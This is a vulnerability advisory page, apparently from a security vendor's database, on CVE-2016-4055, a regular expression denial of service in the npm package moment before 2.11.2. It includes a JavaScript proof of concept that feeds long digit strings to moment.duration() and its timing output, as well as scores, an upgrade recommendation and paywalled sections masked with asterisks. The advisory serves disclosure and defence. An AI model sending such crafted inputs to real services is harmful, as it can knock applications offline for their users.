6.5

CVSS Score

3.0

Basic Information

CVE ID

CVE-2016-4055

GHSA ID

GHSA-87vv-r9j6-g5qv

EPSS Score

0.87086%

CWE

CWE-400

Published

10/24/2017

Updated

2/3/2023

KEV Status

Technology

JavaScript

Concerned about an active attack path?

Talk to our security experts and see Miggo in action.

Miggo Vulnerability Database

→

CVE-2016-4055

CVE-2016-4055: Regular Expression Denial of Service in moment

Versions of moment prior to 2.11.2 are affected by a regular expression denial of service vulnerability. The vulnerability is triggered when arbitrary user input is passed into moment.duration().

Proof of concept

var moment = require('moment');

var genstr = function (len, chr) {
    var result = "";
    for (i=0; i<=len; i++) {
        result = result + chr;
    }

    return result;
}


for (i=20000;i<=10000000;i=i+10000) {
    console.log("COUNT: " + i);
    var str = '-' + genstr(i, '1')
    console.log("LENGTH: " + str.length);
    var start = process.hrtime();
    moment.duration(str)

    var end = process.hrtime(start);
    console.log(end);
}

Results

$ node moment.js
COUNT: 20000
LENGTH: 20002
[ 0, 618931029 ]
COUNT: 30001
LENGTH: 30003
[ 1, 401413894 ]
COUNT: 40002
LENGTH: 40004
[ 2, 437075303 ]
COUNT: 50003
LENGTH: 50005
[ 3, 824664804 ]
COUNT: 60004
LENGTH: 60006
[ 5, 651335262 ]

Recommendation

Please update to version 2.11.2 or later.

(GitHub Advisory)

6.5

CVSS Score

3.0

Basic Information

CVE ID

CVE-2016-4055

GHSA ID

GHSA-87vv-r9j6-g5qv

EPSS Score

0.87086%

CWE

CWE-400

Published

10/24/2017

Updated

2/3/2023

KEV Status

Technology

JavaScript

Technical Details

CVSS Vector

CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

Package Name	Ecosystem	Vulnerable Versions	First Patched Version
moment	npm	< 2.11.2	2.11.2

Vulnerability Intelligence
Miggo AI

Root Cause Analysis

The CVE explicitly states the vulnerability is triggered through moment.duration() with crafted input. The proof of concept demonstrates ReDoS by passing a long string of digits, indicating the duration parsing regex is the attack vector. While exact pre-patch code isn't available, historical context shows duration parsing regex improvements were made in the patched version (2.11.2). The function's role in input parsing and the CVE's specificity give high confidence.

Vulnerable functions

Only Mi**o us*rs **n s** t*is s**tion

WAF Protection Rules

WAF Rule

V*rsions o* `mom*nt` prior to *.**.* *r* *****t** *y * r**ul*r *xpr*ssion **ni*l o* s*rvi** vuln*r**ility. T** vuln*r**ility is tri***r** w**n *r*itr*ry us*r input is p*ss** into `mom*nt.*ur*tion()`. ## Proo* o* *on**pt ``` v*r mom*nt = r*quir*('mo

Reasoning

T** *V* *xpli*itly st*t*s t** vuln*r**ility is tri***r** t*rou** `mom*nt.*ur*tion()` wit* *r**t** input. T** proo* o* *on**pt **monstr*t*s R**oS *y p*ssin* * lon* strin* o* *i*its, in*i**tin* t** *ur*tion p*rsin* r***x is t** *tt**k v**tor. W*il* *x*

6.5

Basic Information

Concerned about an active attack path?

CVE-2016-4055: Regular Expression Denial of Service in moment

Proof of concept

Results

Recommendation

6.5

Basic Information

Technical Details

Vulnerability IntelligenceMiggo AI

Root Cause Analysis

Vulnerable functions

WAF Protection Rules

WAF Rule

Reasoning

Vulnerability Intelligence
Miggo AI